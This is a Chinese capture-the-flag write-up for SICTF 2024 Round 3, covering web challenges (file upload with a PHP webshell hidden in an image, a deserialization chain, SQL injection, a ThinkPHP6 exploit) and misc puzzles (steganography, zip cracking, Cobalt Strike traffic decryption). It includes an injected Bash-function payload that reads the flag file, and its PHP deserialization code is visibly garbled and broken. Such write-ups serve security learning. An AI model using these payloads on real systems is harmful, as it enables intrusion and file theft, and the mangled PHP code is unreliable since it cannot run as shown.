SICTF2024-Round-3 | Qetx Blog

type

Post

status

Published

date

slug

summary

WEB

100％_upload

知识点：文件上传+文件包含

首先上传一个正常图片，抓包，在图片结尾写入一句话木马，记得用php短标签，因为正常begin0fweb(); } public function begin0fweb() { $p=‘hacker!’; $this->welcome->you = $p; } }

class SE{ public year; //CRpublicfunctionset(name, $value){ echo ' Welcome to new year! '; echo($this->year); } }

class CR { public $last;//ET public $newyear;//

}

class ET{

} et = newET();cr=new CR(); se = newSE();Start=new start(); cr− > last=et; $cr->newyear="\nworries";$se->year=cr;Start->welcome=se;Start->you=‘qetx’; echo base64_encode(serialize($Start)); ?>

?get[BASH_FUNC_echo%%]=()%20{%20cat%20/f*;%20}

image-20240219152039294

拿去进行base64解密

image-20240219152108044

hacker

sql注入，过滤了空格和一些关键字

题目告诉了表，用无列名注入，参考笔记https://blog.csdn.net/weixin_46330722/article/details/109605941

payload

image-20240219154129391

Oyst3rPHP

先用/www.zip路由下载源码，因为网站有“RT，一个很简单的Web”的前端显示，所以为了找到源码，在phpstorm中shift+ctrl+f在整个项目中搜索“RT，一个很简单的Web“出现位置，得到了如下的源码

可以知道先要进行MD5绕过，然后是preg_match最大回溯绕过，最后是thinkphp的反序列化漏洞，查看源码中的readme文件，发现thinkphp是6版本，就上网查thinkphp6反序列化漏洞，得到poc

最后用python直接打

image-20240220181209029

MISC

真💨签到

给了一个加密的zip文件，用010打开发现最后的16进制字符，先去16进制解码

image-20240219154336587

image-20240219154356825

后面提示给了文本解密

再去进行文本解密

image-20240219154449307

得到密码去解密文件，得到一个wav文件和一个steg.jpg，对wav文件进行频谱分析，得到

image-20240219154614689

再根据wav文件名“LagrangeisCapatlized”猜测lagrange要大写，然后用steghide去解密steg.jpg

image-20240219155424700

GeekChallege

神秘的流量

img

用脚本解密

img

得到raw key

拿key去解密流量包，但是cs-parse-http-traffic.py脚本要稍微改一下

img

然后去解密

img

img

who？who？who？

根据提示压缩包密码为6位小写字母，去爆破

image-20240223172458801

得到一个txt文件，看起来很像零宽隐写

image-20240223173024545

去在线网站解密https://yuanfux.github.io/zero-width-web/

image-20240223173039947

得到

猜测可能是Rabbit,去在线网站解密https://www.sojson.com/encrypt_rabbit.html

密码给了提示：树木是渣男，所以是shumu

image-20240223173243052

得到的明文像dna加密，去解密

image-20240223175938921